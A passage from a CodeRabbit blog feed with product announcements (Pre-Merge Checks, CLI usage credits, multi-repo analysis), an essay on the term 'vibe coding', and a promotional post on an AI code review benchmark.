are excited to work with the company to help accelerate AI coding adoption across every industry. 
[Get in touch](https://www.coderabbit.ai/contact-us/sales) with our team to access CodeRabbit’s container image if you would like to run AI code reviews on your self-hosted infrastructure.

Pre-Merge Checks: Built-in & custom PR rules automatically enforced

Konrad Sopala — Wed, 11 Mar 2026 00:00:00 GMT

All development teams claim to have PR standards, which often include requirements like: "Ensure docstrings are added," "Reference the associated issue," and "Avoid logging sensitive information." Defining those standards is easy. Enforcing them consistently as PR volume grows is not. If you’re an admin or team lead, you want your team to follow best practices before merging a PR every time, not just when someone remembers the checklist. If you’re a developer, you want to know immediately when something fails and how to fix it fast so you can merge. Pre-merge Checks make your definition of done enforceable. CodeRabbit evaluates every pull request automatically using built-in validations and custom rules written in plain English. Your baseline expectations come out of the box, and your team-specific guardrails run on every PR without anyone having to remember them. [Pre-Merge Checks](https://docs.coderabbit.ai/pr-reviews/pre-merge-checks) address the gap between simply having guidelines and actually enforcing them. ## What are Pre-Merge Checks? Pre-Merge Checks automatically evaluate a pull request whenever it opens or updates. Instead of relying on reviewers to mentally track every policy, CodeRabbit runs structured checks and reports on what passed, what failed, and what needs attention. %[https://youtu.be/knoETRikfwg] Checks can run in warning mode or error mode. You can introduce guardrails gradually in warning mode before turning them into merge blockers, so new rules do not slow developers down unexpectedly. ## Built-In Checks Pre-Merge Checks include built-in validations for common PR requirements most teams already expect. * **Docstring coverage thresholds**: Enforces minimum documentation coverage for new or modified code against a configurable threshold (80% by default). * **PR title validation:** Requires imperative verbs, character limits, or specific formatting conventions. * **PR description validation**: Ensures required sections such as rollout notes or breaking changes exist. 
* **Linked issue verification:** Confirms the PR references an approved issue or ticket. * **Issue alignment assessment:** Flags when changes extend beyond the scope of the linked issue. These checks remove repetitive review comments and keep standards consistent across contributors. No more extra tooling or manual policy enforcement. ## Custom Checks Every team has rules that do not show up in generic linters. Custom checks let you define those requirements in natural language and enforce them automatically. Examples: * **Sensitive data in logs:** Fails a PR if log statements may include passwords, API keys, tokens, SSNs, or payment data. * **Hardcoded credentials:** Detects live keys or variables like \*\_SECRET, \*\_KEY, or \*\_PASSWORD in non-test files. * **Database migration safeguards:** Requires both up() and down() methods and flags destructive changes without rollback logic. * **Breaking change documentation**: Ensures public API, CLI, environment variable, or schema changes are documented in the PR and reflected in [CHANGELOG.md](http://CHANGELOG.md). * **Language migration policies:** Gradually phases out legacy languages by blocking new files while allowing edits to existing ones. You define the rule once and CodeRabbit evaluates it on every pull request. That’s automated governance without brittle CI scripts or regex hacks. Check out our documentation for further details on [how to write effective instructions](https://docs.coderabbit.ai/pr-reviews/custom-checks#writing-effective-instructions) for Custom checks. ## Flexible configuration You can configure Pre-Merge Checks in the CodeRabbit web interface or commit them to your repository using a .coderabbit.yaml file. That means your PR policies live alongside your code and evolve with it. Example:
```plaintext
reviews:
  pre_merge_checks:
    docstrings:
      mode: "error"
      threshold: 85
    title:
      mode: "warning"
      requirements: "Start with an imperative verb; keep under 50 characters."
    description:
      mode: "error"
    issue_assessment:
      mode: "warning"
    custom_checks:
      - name: "Undocumented Breaking Changes"
        mode: "warning"
        instructions: "All breaking changes to public APIs must be documented in the PR and CHANGELOG.md."
```
You can even introduce new guardrails in a warning state first, allowing your team to adjust. Once the rule is refined and the team is ready, transition it to an error state. Guardrails should evolve naturally with your team's process rather than being implemented abruptly. ## Manual controls You can also trigger checks directly inside a pull request. Run all configured checks: ```plaintext @coderabbitai run pre-merge checks ``` Test a custom rule before saving it: ```plaintext @coderabbitai evaluate custom pre-merge check --name --instructions --mode ``` Override failures when necessary: ```plaintext @coderabbitai ignore pre-merge checks ``` ## Why this matters Without automated enforcement: * Reviewers spend time re-checking predictable requirements * Standards drift across teams * Safeguards depend on memory * High-signal review time gets wasted on hygiene With Pre-Merge Checks: * Standards apply consistently to every PR * Risky patterns get flagged automatically * Breaking changes get documented before merge * Reviewers focus on architecture, tradeoffs, and edge cases Pre-Merge Checks answer one question before code lands: Does this PR meet our standards? If not, you get clear feedback. If it does, you merge with confidence. This transforms informal guidelines into built-in, customizable, and automatic guardrails that are fully enforceable. ## Get started with Pre-Merge Checks Enable Pre-Merge Checks in CodeRabbit and start with one rule your team already cares about like docstrings, breaking changes, migration safety, or title conventions. Run them in warning mode and see what gets flagged. Then move to enforcement when you are ready. Standards are easy to write. Enforcement is what changes behavior. 
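To make the difference between warning mode and error mode concrete, here is a minimal sketch. It assumes that a failed check blocks the merge only when it runs in error mode, while a failed warning-mode check is merely reported. The `CheckResult` type and both helper functions are hypothetical and are not part of CodeRabbit's API.

```python
from dataclasses import dataclass


@dataclass
class CheckResult:
    name: str
    mode: str      # "warning" or "error", the two modes described in this post
    passed: bool


def blocks_merge(results: list[CheckResult]) -> bool:
    """Assumed semantics: only a failed error-mode check blocks the merge."""
    return any(not r.passed and r.mode == "error" for r in results)


def reported_warnings(results: list[CheckResult]) -> list[str]:
    """Names of failed warning-mode checks, surfaced without blocking."""
    return [r.name for r in results if not r.passed and r.mode == "warning"]


results = [
    CheckResult("docstrings", "error", passed=True),
    CheckResult("title", "warning", passed=False),
    CheckResult("Undocumented Breaking Changes", "warning", passed=False),
]
```

With these results the merge is not blocked, but two warnings are reported. Switching the `title` check to `"error"` would turn the same failure into a blocker, which is the gradual rollout path described above.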
[Try CodeRabbit on your next pull request](https://app.coderabbit.ai/login???free-trial) and see what it catches. Pre-Merge Checks are available for Pro plan users and allow users to configure up to 5 custom checks per organization.

Introducing Usage-Based Add-On. Allow unrestricted access to CodeRabbit CLI through agentic coding loops.

Konrad Sopala — Wed, 11 Mar 2026 00:00:00 GMT

CodeRabbit now supports **unlimited reviews using the CLI**, helping you to perfect code while running your agentic coding loops with Claude Code, Codex and more! Buy credits, use them at your own pace, and get full control over your CLI usage - right from the [CodeRabbit web interface](https://app.coderabbit.ai/). ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c95e3d2cad19f1e0456017ddb981eca91b8304dfba95d4da7a6d84c53de789a3_1c0aa6888f.png) ## What's New From now on, you can purchase credits to get unrestricted access to CodeRabbit CLI. There are three options available: * **One-Time Purchase** - Buy credits on demand and pay only for what you need and when you need it. You can also turn Auto-refill on or off here. * **Auto-refill (set it and forget it)** - Configure a refill threshold and top-off amount, so your CI pipelines and CLI workflows never stall because of an empty balance. * **Monthly Subscription** - Set up a recurring credit top-up and never worry about running out of credits. You can cancel your subscription any time. Once you start using your credits, you’ll want to know where you stand. The [**Usage-Based Add-On**](https://app.coderabbit.ai/settings/subscription) tab gives you real-time visibility into your credit spend, showing your current balance alongside a spending chart. Credits are simple: $1 gets you one credit, and each reviewed file costs $0.25. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4c1d3a6f8784d0cdd2b1bed6d9cd74265106cf6009aeb5ba4337f4b58b7e0e3d_4c40c22102.png) ## Getting Started Here’s a step-by-step setup guide: * **Install CodeRabbit CLI** * Follow the instructions [here](https://docs.coderabbit.ai/cli#getting-started) or simply run this command in your terminal and follow along. 
```plaintext curl -fsSL https://cli.coderabbit.ai/install.sh | sh ``` * **Choose your purchase method** * Head to [Account Settings](https://app.coderabbit.ai/settings/team-management) in the CodeRabbit web interface and find [Subscription and Billing](https://app.coderabbit.ai/settings/subscription). You’ll see the Usage-based add-on tab there, where you can choose between a monthly subscription, a one-time purchase or auto-refill. * **Create an Agentic API Key** * Once your purchase is complete, navigate to the [API Keys](https://app.coderabbit.ai/settings/api-keys) section and generate your **Agentic API key**. * **Run CodeRabbit via your AI Agent** * Prompt your agent to run a CodeRabbit CLI code review using the following command: ```plaintext coderabbit --plain --api-key cr-*********** ``` * To avoid passing the key on every command, prompt your agent to authenticate once with your CodeRabbit API key using the following command: ```plaintext coderabbit auth login --api-key cr-************ ``` After logging in, prompt your agent to run a CodeRabbit CLI review without passing the API key again: ```plaintext coderabbit review --plain ``` ## Give it a try %[https://youtu.be/bMItn3G_upQ?si=D5mJu_tFUzXM7N7N] Ready for unlimited CLI reviews? Head to the [CodeRabbit web interface](https://app.coderabbit.ai/settings/subscription) and grab some credits. Whether you go with a one-time purchase or set up a monthly subscription, you'll be up and running in minutes. And if you run into anything or have feedback, [let us know](https://x.com/coderabbitai). We're building this for you.
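As a quick worked example of the pricing stated in this post ($1 per credit, $0.25 per reviewed file), the sketch below estimates what a review costs and how many files a balance covers. The function names are hypothetical, and the auto-refill rule (top up when the balance drops below the threshold) is an assumption about how the threshold behaves, not a documented guarantee.

```python
from decimal import Decimal

PRICE_PER_FILE = Decimal("0.25")  # dollars per reviewed file, as stated in the post


def review_cost(files_reviewed: int) -> Decimal:
    """Dollar cost (equal to credits, at $1 per credit) of reviewing N files."""
    return PRICE_PER_FILE * files_reviewed


def files_covered(balance: Decimal) -> int:
    """How many file reviews a given credit balance can pay for."""
    return int(balance // PRICE_PER_FILE)


def apply_auto_refill(balance: Decimal, threshold: Decimal, top_off: Decimal) -> Decimal:
    """Assumed rule: add the top-off amount once the balance is below the threshold."""
    return balance + top_off if balance < threshold else balance
```

Under these numbers, a 40-file review costs 10 credits, and a 10-credit balance covers exactly 40 reviewed files.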

Introducing one of the most requested CodeRabbit features: Multi-Repo Analysis.

Konrad Sopala — Fri, 06 Mar 2026 00:00:00 GMT

If you've ever merged a pull request that passed every check, looked clean in review, and then broke a downstream service ten minutes later…you already know the problem. When your architecture spans multiple repos (microservices, shared libraries, separate frontend and backend packages), a change in one place can silently break things in another. A renamed field in your API response schema? Looks great in the PR, but the three services that parse that response have no idea what's coming. This is one of the most common pain points we hear from teams running multi-repo setups and it's been one of the most requested features among our customers. So we built it. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2d37bdb49f279d11fb5d419adc109b33e5056a6a35d2355354ff4dd64f9071b2_05d55ff8a9.png) ## Introducing Multi-Repo Analysis [Multi-Repo analysis](https://docs.coderabbit.ai/integrations/knowledge-base#linked-repositories-cross-repo-review) is a new CodeRabbit feature available to Pro, Pro Plus, and Enterprise tier users that lets you connect related repositories so that CodeRabbit pulls context from across all of them during code reviews. Think microservices, shared libraries, API contract changes, or any setup where a change in one repo can quietly break another. More information on linked repositories per plan can be found [here](https://docs.coderabbit.ai/knowledge-base/multi-repo-analysis). When a pull request modifies a shared API, type definition, or database schema, CodeRabbit automatically explores your linked repositories for downstream impact. Instead of reviewing changes in isolation, you get the full picture before you merge. 
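The renamed-field scenario is easy to reproduce in miniature. In the sketch below, the response payloads, the `downstream_parse` consumer, and the `find_missing_fields` helper are all hypothetical. They only illustrate why a change that looks clean in one repo can break a consumer in another, and they say nothing about how CodeRabbit detects it.

```python
# Hypothetical API response before and after a field rename in the producer repo.
old_response = {"user_id": 42, "email": "a@example.com"}
new_response = {"id": 42, "email": "a@example.com"}


def downstream_parse(response: dict) -> int:
    """Hypothetical consumer living in another repo; it still expects `user_id`."""
    return response["user_id"]


def find_missing_fields(expected: set[str], response: dict) -> set[str]:
    """Fields a consumer relies on that the response no longer provides."""
    return expected - set(response)
```

Calling `downstream_parse(new_response)` raises a `KeyError`, even though nothing in the producer's own repo fails. A cross-repo check in the spirit of `find_missing_fields` would surface the missing `user_id` before the merge.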
![](https://victorious-bubble-f69a016683.media.strapiapp.com/cb69c5e5dcae9ce8bdb50365ba35439183d9366f29748272356493cae815f0bf_e8dcbec371.png) ## Setup & configuration Before you start using it, there are some [platform-specific requirements](https://docs.coderabbit.ai/integrations/knowledge-base#platform-requirements) to go through, to make sure the CodeRabbit bot has read access to all linked repositories:

| Platform | Requirement |
| --- | --- |
| GitHub | The CodeRabbit GitHub App must be installed on all linked repositories. Inaccessible repositories are skipped, and a warning appears in the review summary. |
| GitLab | The bot token must have read access. Tokens are typically scoped to the group or instance. |
| Bitbucket Cloud | The bot token must have read access. Tokens are scoped to the workspace. |
| Azure DevOps | The PAT must have read access. Tokens are scoped to the organization. |

Once that's configured, you can finish the setup in two ways: * **Through the CodeRabbit web interface** * Head to the [Repositories](https://app.coderabbit.ai/settings/repositories) section and select a repository that you would like to add a linked repository to * Switch off the *Use Organization Settings* toggle * Go to the [Knowledge Base](https://app.coderabbit.ai/organization/settings?tab=knowledge_base) and find the *Linked Repositories* section. * Add a new linked repository with instructions that will guide CodeRabbit during review. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/446b01cc3fb585b9e7c7af91aee38f1237f063cecf8ec91342ffb1d33afb7619_8ccad5d9f3.png) * **Through YAML configuration** * Add a *linked\_repositories* section under *knowledge\_base* in your [.coderabbit.yaml](https://docs.coderabbit.ai/getting-started/yaml-configuration) file.
```plaintext
# yaml-language-server: $schema=https://coderabbit.ai/integrations/schema.v2.json
knowledge_base:
  linked_repositories:
    - repository: "myorg/backend-api"
      instructions: "Contains REST API endpoints and database models"
```
Keep in mind that as of now, each repository configuration supports only one linked repository, though multiple linked repos are planned in the future. For full setup details, check the [docs](https://docs.coderabbit.ai/knowledge-base/multi-repo-analysis). ## See it in action If you want a hands-on walkthrough, one of our Developer Advocates put together a tutorial that shows Multi-Repo analysis catching real cross-repo issues in a review. %[https://youtu.be/BrT4rSHhA10?si=FzPUzcBUgqXdHXmZ] ## Try it now Multi-Repo Analysis is available today. Connect your repos, open a PR, and let CodeRabbit show you what you've been missing. [Get started](https://app.coderabbit.ai/login)

A semantic history: How the term 'vibe coding' went from a tweet to prod

David Kravets — Thu, 05 Mar 2026 00:00:00 GMT

A year is an eternity in AI time. In February 2025, Andrej Karpathy dropped a [tweet-sized cultural marker](https://x.com/karpathy/status/1886192184808149383) into the software world: “vibe coding.” The phrase stuck because it captured a visceral shift in the developer experience. Instead of grinding through syntax, you describe an intent in plain English, watch the code manifest, and nudge the output until reality matches your vision. In this initial vision of vibe coding, Karpathy famously framed it as engineering where you, “fully give in to the vibes, embrace exponentials, and forget that the code even exists.” ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3577a88bff406c83078cedf8934a854f78f5a867a6559e18a5e4c4c3524bd5dc_1d760a4b7e.png) Karpathy’s point wasn't just that AI could help you code. We’ve had copilots for years. The point was that AI made it tempting to treat code as a steerable draft rather than something requiring line-by-line authorship. One year later, the "vibe" has evolved. Vibe coding doesn’t just refer to what we’re doing when coding a hobby project or slapping together a prototype anymore. We are managing an explosion of machine-generated logic destined for production systems, and we’re often calling that vibe coding, too. But is it really vibe coding? And if it’s not, what should we be calling it? And how should we be treating it in production systems? ## The semantic drift: From play to production ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dc01cc5aa8918cdfe7781f2e97c9ba7c38b4cc03770cca70a933af10a208ff9f_3947c458b5.jpg) When vibe coding was honored as a 2025 [Word of the Year by Collins Dictionary](https://blog.collinsdictionary.com/language-lovers/collins-word-of-the-year-2025-ai-meets-authenticity-as-society-shifts/), it signaled that the workflow had gone mainstream. But as the phrase broadened, so did the stakes. 
Vibe coding today has become shorthand for any prompt-driven development, rather than the specific prompting experience Karpathy originally described. This drift isn’t a linguistic accident. More than anything, it’s a signal that many engineering teams have added AI to their stacks and are struggling with the quality of its output and its downstream effects. In fact, the use of vibe coding to describe the generation of code for production-grade systems has taken on somewhat negative connotations. The term was invoked by many precisely to emphasize that, in some cases, relying too much on AI-generated code at work was trusting an LLM’s vibes in a way better suited for a weekend project, rather than for customer-facing applications of a publicly listed company. For example, as AI coding agents were adopted by more teams in 2025, devs on LinkedIn renamed themselves [Vibe Code Cleanup Specialists](https://www.linkedin.com/posts/deveshbhardwajj_ai-startups-engineering-activity-7373218403068788736-VXlT) in their profiles (a joke we ran with for our [AWS re:Invent booth](https://x.com/yoimkonrad/status/2013539187224375400?s=46&t=OXgZw0VC393gp6RVxqzq0A) this year). What’s more, Collins’ competitor Merriam-Webster went in another direction for their word of the year choice. They chose [slop](https://www.merriam-webster.com/wordplay/word-of-the-year), highlighting the large gulf that still existed between AI optimism and AI output. Indeed, for many, the promise of AI coding agents has translated into hours spent reviewing AI slop, reworking code [due to unclear prompts or intent](https://www.coderabbit.ai/blog/the-hidden-cost-of-ai-coding-agents-isnt-from-ai-at-all?), and dealing with incidents or bugs in production. As we move from "throwaway weekend projects" (as Karpathy originally described his use of vibe coding) to core infrastructure, the constraints of software development have shifted. We no longer have a creation problem. We have a confidence problem. 
And that lack of confidence was reflected in how the word came to be used throughout 2025 for almost all uses of AI for coding, even those at work. ## A word under pressure: Why devs both love and hate vibe coding ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2c1fa5c3bb7348b339b46968021d712714883c2fa2068c572936cfc9802912f1_a5ce946607.jpg) Some of the biggest tech companies brag about how a growing amount of their code, if not all, [is written by AI](https://www.coderabbit.ai/blog/ai-code-metrics-what-percentage-of-your-code-should-be-ai-generated). That can’t be accomplished by simply forcing devs to use AI. Many, if not most devs, appreciate the time and cognitive savings of [using AI agents](https://www.atlassian.com/blog/developer/developer-experience-report-2025) for certain tasks and types of code. But that’s not the full story. For many devs, AI coding agents often actually equal more work, and that’s measurable in how the most experienced people in the room are spending their hours. Fastly’s [recent survey](https://www.fastly.com/blog/senior-developers-ship-more-ai-code) of 791 professional developers illustrates this shift in real-time. The data shows that senior developers are far more likely to ship large amounts of AI-generated code. * **Volume:** Roughly one-third of senior developers report that about half their shipped code is now AI-generated (compared to just 13% of juniors). * **The review tax**: Nearly 30% of senior devs report that editing and auditing AI output offsets most of their initial time savings from AI. This tells us that the most experienced engineers aren't using AI to work less. They are using it to manufacture more complexity, which they then have to manage. That’s not just because they’re coding more. It’s also because reviewing AI code is simply harder. Our own [State of AI vs. 
Human Code Generation study](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report), for example, found that AI-generated code had 1.7x more bugs and issues and 1.4x more critical issues. Today, when it seems like everyone is vibe coding at work, code review is no longer a predictable ritual at the end of a sprint. Now, it is the primary mechanism that makes high-velocity engineering safe. Put differently, it’s the stage where issues and bugs now slip through more frequently, and the one that requires significantly more time and attention to get right. In a way, it must feel to some developers like a Faustian bargain. In return for manually writing less code, they’re having to manually review more of it. And those reviews have increasingly become stressful, load-bearing stages of the software development lifecycle. But one glance at the surge of headlines about incidents clearly shows that the normal review cycle (and likely senior devs) is breaking under the added load. The difficulty of finding all the additional issues AI generates is leading to a wave of incidents that are suspected to stem from, or have been traced back to, AI-generated code. ## Incidents changed the vibe coding conversation ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3ff1d46f4c8f7d7d067527d16e4dacdbccc5452d3ea00f2273f2c01cfff2f51a_bba1bae02a.png) As AI-generated code moved from prototypes into production systems, incident data began to reflect the strain. Industry outage tracking in early 2025 showed a [measurable spike](https://www.coderabbit.ai/blog/why-2025-was-the-year-the-internet-kept-breaking-studies-show-increased-incidents-due-to-ai) in global service disruptions during peak AI adoption months, before stabilizing later in the year. That analysis raised a harder question: not whether AI can generate code, but whether teams are verifying it rigorously enough before it ships. At the same time, teams reported a growing review burden. 
Faster generation meant more logic to inspect, more edge cases to reason through, and more subtle regressions to catch. When verification practices don’t scale at the same rate as output, small defects are more likely to escape into production. Recent high-profile events reinforced the point. For example, news reports detailed an [AWS disruption](https://www.reuters.com/business/retail-consumer/amazons-cloud-unit-hit-by-least-two-outages-involving-ai-tools-ft-says-2026-02-20/) in which an internal AI coding assistant was involved in changes that contributed to a 13-hour interruption of a cost-management service. While misconfigured access controls, not autonomous AI behavior, were later identified as the root cause, it was ultimately the AI that made the change that took down the system. Similarly, Moonwell recently dealt with an incident that saw it accidentally issue [$1.8 million in bad debt](http://finance.yahoo.com/news/oracle-error-leaves-defi-lender-082155372.html?guccounter=1&guce_referrer=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce_referrer_sig=AQAAANRP-C1XZnEqcpitPfwnrBhu46h20KdgmG1GWVmifMnb9gbTRBImfb7BhTM9pFVB-NZJqUxpY3SiPnlPVl4vLKL1LS-uYTKLirpb5NNKQY-V04HTCX3e3jVsJxPSQ-ubBiMlnGWf4503odt6oZb0od3VawMW8LZZMdoAWGnMlzR_), which many suggest was caused by AI-powered development. The Kimi chatbot experienced [reliability issues](https://datainnovation.org/2025/01/moonshot-ai-betting-big-on-long-context-confronting-the-challenges-of-scale-and-reliability/) and outages amid surging demand as the company scaled aggressively, highlighting how systems can strain when rapid AI adoption outpaces infrastructure maturity. This is where “vibe coding” shifted further in tone. What began as a playful description of prompt-driven creation took on an even more skeptical edge in production contexts. Not because engineers reject AI leverage, but because incidents make the verification gap visible. 
When change accelerates without proportional review rigor, risk increases and devs become frustrated. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/956510b81de7b459d29b4d2142aa4d3e64533916f43a0bda83e4b4876cce98a1_6785e30a38.png) ## The rise of ‘agentic engineering’: Vibe maturity or the same slop by another name? Karpathy recently refined his vibe coding thesis, noting that while the vibe started as an exploration, it has matured into what he and others describe as “agentic engineering.” This seems like an attempt on Karpathy’s part to decouple AI-driven development from the baggage that the term vibe coding carries. But it’s also meant to mark a different kind of workflow that requires a fundamental shift in how we define technical oversight. As Karpathy sees it, the industry is moving toward a model where speed and rigor are no longer mutually exclusive. “Today (1 year later), programming via LLM agents is increasingly becoming a default workflow for professionals, except with more oversight and scrutiny. The goal is to claim the leverage from the use of agents but without any compromise on the quality of the software,” Karpathy recently [wrote](https://x.com/karpathy/status/2019137879310836075) on X. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ac27503f58b445c68618a9d9eb8e9c6648f216e8936a15db7052ae565392dd5e_8ec9b8237a.png) This new paradigm is meant as a distinction from the vibe coding era. The job is no longer to coach the model or to vibe with it but to plan for and verify its logic. Whether “agentic engineering” will catch on as the main way to describe AI-driven development or whether the derogatory use of vibe coding in a professional context will continue remains to be seen. ## What’s next for vibe coding? The future of the word and working style Here’s the optimistic reading of the last year. Vibe coding didn’t break engineering, even if it did increase incidents. 
Instead, it forced us to define what the craft actually is and imagine how it might evolve in the coming years. That’s led some to talk about how we’re on the cusp of a new [golden age of software engineering](https://newsletter.pragmaticengineer.com/p/the-third-golden-age-of-software), and others to proclaim that [developers are dead](https://www.coderabbit.ai/blog/developers-are-dead-long-live-developers). Whether autonomous agents will ever replace developers is still highly contested. But what’s crystal clear is that the future of vibe coding as a word is entirely dependent on solving the quality problem AI-driven development currently faces. That’s the only way that “vibe coding” is set to become less derogatory and have a chance of evolving into Karpathy’s preferred term for it: “agentic engineering.” But to get there, we’ll need to adopt and perform rigorous “vibe checks” as an industry (that’s our suggestion for the 2026 word of the year, if you’re listening Collins and Merriam Webster). In its original cultural context, a vibe check is a gut-check, a moment of scrutiny to see if something is as real as it claims. At CodeRabbit, we first used this term in May 2025 to describe how our AI code reviews can help ensure your code’s quality. In 2026, it’s our belief that rigorous vibe checks must become a technical standard. The same tipping points we saw around the adoption of agentic AI in 2025 must happen in 2026 around tools that are focused on verifying and testing AI generated code. These vibe checks can include a number of different safeguards and systems designed to keep AI slop and issues from interfering with your production system, including things like AI code review. A vibe check is, essentially, your quality gate, something AI code makes more critical than ever before. We might have fallen in love with vibe coding because it named a feeling, the thrill of code appearing faster than the brain can keep up. 
But going forward, we need less vibing and more checking. That’s the only way vibe coding grows up. ***Need a vibe check?*** [***Try CodeRabbit free today.***](https://coderabbit.link/Gg1HxjW)

CodeRabbit tops the first independent AI code review benchmark

Sahil Mohan Bansal — Tue, 03 Mar 2026 00:00:00 GMT

AI code review benchmarks have mostly been published by other code review vendors (whose tools always seem to come out on top in their benchmarks). We've [written before](https://www.coderabbit.ai/blog/framework-for-evaluating-ai-code-review-tools) about why we don’t think vendor-generated benchmarks provide the credibility developers actually need when choosing an AI tool. So, we’re glad to see that someone has finally built the first independent benchmark, one that covers nearly 300,000 real-world PRs reviewed by CodeRabbit. Martian's [Code Review Bench](https://codereview.withmartian.com/) is the first independent public benchmark to evaluate AI code review tools using real developer behavior, and CodeRabbit comes out on top. Their leaderboard shows **CodeRabbit has the highest recall** of any tool, almost 15% more than the next closest tool. In plain terms: **CodeRabbit finds more real bugs** than anyone else. CodeRabbit also tops the overall chart with the **highest F1 score** (balance of precision/recall), with **a 51.2% score**, more than any other code review tool. Precision refers to the accuracy of a tool. Recall refers to the comprehensiveness of a tool. CodeRabbit balances both and delivers the most accurate AI code reviews. [![Code Review Benchmark by Martian](https://victorious-bubble-f69a016683.media.strapiapp.com/d0b6120fcf5fa75443d317abac36b89a33ae95f006465661dc27d7260ae9d03c_f066dc5668.png)](https://codereview.withmartian.com/) *Code Review Bench results: y-axis shows the recall rate, x-axis shows the precision* ### What is Code Review Bench? [Code Review Bench](https://withmartian.com/post/code-review-bench-v0) is a new benchmark published by [Martian](https://withmartian.com), a research lab with team members from DeepMind, Anthropic, and Meta. They evaluated 10 tools across hundreds of thousands of PRs. Their [methodology and code](https://github.com/withmartian/crb) are fully open source. 
What makes Code Review Bench different from previously published code review benchmarks is its two-pronged approach involving real-world data from developers and a base gold set of known bugs to look for. * **Online benchmark:** analyzes code review comments that developers actually accept or reject across open source repos. When a developer fixes an issue found by a code review tool, that's a signal that the review comment was useful. When they ignore it, that's valuable data, too. * **Offline benchmark:** runs every code review tool on the same 50 PRs and analyzes them against a curated set of previously identified bugs called the “gold set.” This is a controlled comparison, but one influenced by human judgment, because human annotation is required to classify a review comment as a real bug or a false positive. ### Code Review Bench Results In the online benchmark, which is grounded in real developer behavior and is the one Code Review Bench itself calls the headline metric, CodeRabbit ranks **#1 in F1 score** (harmonic mean of precision and recall) among all 10 tools included. [![](https://victorious-bubble-f69a016683.media.strapiapp.com/d11b748ce50e365cbd85f464cc5dc240b380c1d224ce52aa03a23791a550ae4b_f8a7918315.png)](https://codereview.withmartian.com/) *Code Review Bench results analyzed from Jan-Feb 2026* Martian measured CodeRabbit's reviews **across nearly 300,000 pull requests** over a two-month period, one of the largest samples in the dataset. That represents tens of thousands of developers, on real projects, deciding whether to act on what we flagged. Developers act on CodeRabbit's suggestions at a meaningful rate. Its 49.2% precision means roughly one in two comments leads to a code change. This, combined with a higher recall rate than any other tool, leads to the highest F1 score among all tools. ### Optimizing the precision-recall tradeoff But what exactly are precision and recall when it comes to code reviews? 
Put simply: Precision is the percentage of a tool's review comments that are true positives. Mathematically, it is the number of true positives divided by the total number of comments the tool made (true positives plus false positives). If a tool returned 100 comments, of which 80 were true positives and 20 were false positives (wrongly identified as bugs), then its precision is 80%. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/76bd6eb7db3844b2255df92895ac5b1dda8695da5778482147b8785e00df4351_7de9256f6b.png) Recall is the percentage of all the bugs that exist that the tool actually found. Mathematically, it is the number of true positives divided by the total number of real bugs (true positives plus the bugs the tool missed), which makes it a measure of comprehensiveness. If a tool returned 50 comments, all of them true positives, but there were actually 100 real bugs in the PR, then its recall is 50%. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f1fc74f29d7cb729613f146f766236803683c2cecf9444f7b0b50c0a1b7a7b78_e4f0ad601e.png) There's a common assumption when comparing code review tools that the best tool is the one with the highest precision. Fewer comments, higher precision: sounds intuitive, right? However, CodeRabbit has always taken a slightly different approach. CodeRabbit is specifically engineered to have a good balance between precision and recall. We would rather flag a real bug you choose to dismiss than miss a real bug you needed to see. This comes from optimizing not just for high accuracy (precision) but for both high accuracy and surfacing more bugs (recall). Optimizing for both precision and recall leads to catching the highest number of real bugs. 
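To make the arithmetic concrete, here is a minimal Python sketch of the three metrics. The function names are ours, chosen purely for illustration; they are not part of Code Review Bench or CodeRabbit. It reproduces the two worked examples above (assuming, for the recall example, that all 50 comments were true positives) and then plugs in the 49.2% precision and 53.5% recall quoted in this post. The result lands within rounding distance of the reported 51.2% F1.

```python
def precision(true_positives: int, false_positives: int) -> float:
    """Share of a tool's comments that point at real issues."""
    total_comments = true_positives + false_positives
    return true_positives / total_comments if total_comments else 0.0


def recall(true_positives: int, false_negatives: int) -> float:
    """Share of all real issues that the tool actually flagged."""
    total_bugs = true_positives + false_negatives
    return true_positives / total_bugs if total_bugs else 0.0


def f1_score(p: float, r: float) -> float:
    """Harmonic mean of precision and recall."""
    return 2 * p * r / (p + r) if (p + r) else 0.0


# Worked example 1: 100 comments, 80 real bugs, 20 false alarms.
print(precision(true_positives=80, false_positives=20))  # 0.8

# Worked example 2: 50 real bugs flagged, 50 real bugs missed.
print(recall(true_positives=50, false_negatives=50))  # 0.5

# Figures quoted in this post: 49.2% precision, 53.5% recall.
print(round(f1_score(0.492, 0.535), 3))  # 0.513
```

Because F1 is a harmonic mean, it drops sharply when either input is low, so a tool cannot score well by maximizing precision alone or recall alone.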
[![](https://victorious-bubble-f69a016683.media.strapiapp.com/407ee1cbb7537be8e5b9166c27f274951ad7725d0840443053724b4aaaf8381d_8fd92f9027.png)](https://codereview.withmartian.com/) *High precision and high recall lead to more true positives being found.* The online benchmark approach matters because the offline approach will often score a comment as a false positive when a code review tool finds a real issue that the benchmark's gold set doesn't include. High-volume tools like CodeRabbit simply surface more issues that the gold set didn't anticipate, which biases the offline benchmark against tools with higher recall. By not relying on a curated set of “correct” answers, the online benchmark sidesteps this oversight. It counts what developers actually did in their PRs. Code Review Bench found that devs acted on CodeRabbit's comments at roughly the same rate as tools that comment half as often. By surfacing more comments, CodeRabbit ultimately catches more critical bugs. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/af53beb4f6be14db9de015308bc0a40badeaf79c297f08c7b8a507a1ceeb74c0_604e993da9.png) ## Offline benchmark tells a different story (and that's the point) In the 50-PR offline comparison mentioned in [Code Review Bench](https://codereview.withmartian.com/), CodeRabbit showed a lower F1 score than in the online analysis that included comments accepted by devs in real PRs. The benchmark's authors are transparent that the offline benchmark has "significant divergence" from the online data that needs to be improved. They describe two specific problems that affect high-volume tools disproportionately: * **The gold set is incomplete.** The offline comparison started with a dataset of known bugs curated by two other code review vendors, but they found some comments that were scored as "false positives" were actually real issues the gold set didn't include. 
